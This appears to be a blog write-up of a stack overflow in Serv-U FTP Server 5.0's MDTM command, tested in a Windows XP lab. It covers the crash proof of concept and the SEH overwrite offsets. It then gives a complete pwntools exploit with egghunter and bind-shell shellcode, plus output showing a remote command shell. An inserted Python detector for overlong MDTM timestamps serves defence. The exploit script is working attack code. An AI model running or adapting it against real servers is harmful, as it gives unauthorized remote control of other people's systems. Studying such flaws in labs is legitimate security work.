ღ Miranda

Serv-U FTPd Server 5.0 MDTM Command Buffer Overflow

Exploitation of the MDTM command buffer overflow in Serv-U 5.0.

Verifying the vulnerability

The target system is Windows XP SP3. Assume the FTP server address is 192.168.134.128 and that both the username and the password are test. Try sending an overlong value as the time argument of the MDTM command:

$ ftp 192.168.134.128
Connected to 192.168.134.128.
220 Serv-U FTP Server v5.0 for WinSock ready...
Name (192.168.134.128:seviezhou): test
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote MDTM 19811102172800+11_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBB test.txt
421 Service not available, remote server has closed connection.

The service crashed. Attaching Immunity Debugger to ServUDaemon and sending the same command again shows:

00683AC2   F3:A5  REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

At this instruction ESI=41414142, which raises an exception. Looking at the SEH chain:

SEH chain of thread 00000560, item 0
 Address=00EFD1BC
 SE handler=41414141

The exception handler address has been overwritten, so we indirectly control EIP: the exception transfers control to the overwritten handler.
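From the defender's side, the crash above is easy to spot on the control channel: a legitimate MDTM set-time argument is a short, fixed-shape timestamp, while the crashing request carries a timestamp field of well over a hundred bytes. The following detector is an added example (not code from the original post): it checks the timestamp field of MDTM set-time commands for shape and length, and runs over constructed sample lines. The accepted timestamp grammar and the length bound are assumptions chosen for this example, not Serv-U's own parser rules.

```python
import re

# Constructed sample FTP control-channel command lines (not captured traffic).
SAMPLE_LINES = [
    "MDTM 19811102172800 test.txt",                        # plain set-time form
    "MDTM 19811102172800+11_ test.txt",                    # extended form seen in the post
    "MDTM 19811102172800+11_" + "A" * 120 + " test.txt",  # overlong field, like the crash PoC
    "SIZE test.txt",                                       # unrelated command
    "MDTM test.txt",                                       # query form, no timestamp
    "MDTM " + "1" * 40 + " test.txt",                      # timestamp field stuffed with digits
]

# Assumed grammar: YYYYMMDDHHMMSS, optional +/- offset of up to four digits,
# optional trailing '_' (the shape of the value in the post).
TIMESTAMP_RE = re.compile(r"^\d{14}([+-]\d{1,4}_?)?$")
MAX_TIMESTAMP_LEN = 20  # assumed generous bound; the overflow needs far more

def check_mdtm(line):
    """Return a finding dict for an MDTM set-time command whose timestamp
    field is overlong or malformed, otherwise None."""
    parts = line.rstrip("\r\n").split(" ", 2)
    if parts[0].upper() != "MDTM" or len(parts) != 3:
        return None  # not MDTM, or the two-argument query form (MDTM filename)
    ts = parts[1]
    reasons = []
    if len(ts) > MAX_TIMESTAMP_LEN:
        reasons.append("overlong")
    # Only judge shape when the field looks like a timestamp attempt, so a
    # query-form filename containing spaces is not reported as malformed.
    if ts[:1].isdigit() and not TIMESTAMP_RE.match(ts):
        reasons.append("malformed")
    if not reasons:
        return None
    return {"timestamp_len": len(ts), "reasons": reasons, "filename": parts[2]}

def scan(lines):
    """Scan command lines; return (index, finding) pairs for suspicious ones."""
    findings = []
    for i, line in enumerate(lines):
        f = check_mdtm(line)
        if f:
            findings.append((i, f))
    return findings

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_LINES):
        print(f"line {idx}: {finding}")
```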

Exploitation

After locating the offsets, the payload layout is:

"MDTM 19811102172800+11_" + "A"*44 + nextseh + sehhandler + others

On XP, sehhandler must be overwritten with the address of a pop pop ret; the mona plugin finds many such addresses, and I arbitrarily picked 0x10060f97. nextseh is filled with a jump instruction to the shellcode that follows. One problem is that this buffer has a length limit and cannot hold the shellcode, so an egghunter is needed: the filename has no length limit and can hold the shellcode, so the egghunter code goes in others and the shellcode is placed in the filename argument.

At first I used a shellcode that pops up the calculator, but it never appeared. Finally, monitoring processes with procexp.exe, I found that a calc.exe child process was indeed created under ServUDaemon and remained after the service closed, but it was not displayed. So I used a shellcode from exploit-db that opens port 53 on the server and waits for a connection.

The script is as follows:

from pwn import *
from os import system

#context.log_level = 'DEBUG'

search = ""
search += "\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F"
search += "\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF"
search += "\xD3"
buf = ""
buf += "lion" # shellcode egg tag, searched for by the egghunter
buf += "\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
buf += "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99"
buf += "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
buf += "\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
buf += "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
buf += "\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14"
buf += "\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B"
buf += "\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA"
buf += "\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4"
buf += "\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16"
buf += "\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10"
buf += "\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98"
buf += "\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66"
buf += "\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66"
buf += "\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF"
buf += "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
buf += "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7"
buf += "\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D"
buf += "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75"
buf += "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2"
buf += "\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70"
buf += "\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0"
buf += "li0n"

ppr = 0x10060f97 # pop esi # pop ecx # ret

p = remote('192.168.134.128', 21)

p.recvline()
p.send('USER test\r\n')
p.recvline()
p.send('PASS test\r\n')
p.recvline()

payload = "MDTM 19811102172800+11_"
payload += "A" * 44
payload += "\x90\x90\xEB\x04" # nop nop jmp 4
payload += p32(ppr)
payload += search # egghunter goes in the length-limited buffer
payload += " "
payload += buf # egg-tagged shellcode goes in the unrestricted filename argument
payload += "\r\n"

p.send(payload)

log.success("Connecting to shell...")
system("telnet 192.168.134.128 53")

Run:

$ python servu.py
[+] Opening connection to 192.168.134.128 on port 21: Done
[+] Connecting to shell...
Trying 192.168.134.128...
Connected to 192.168.134.128.
Escape character is '^]'.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\>exit
exit
Connection closed by foreign host.
[*] Closed connection to 192.168.134.128 port 21
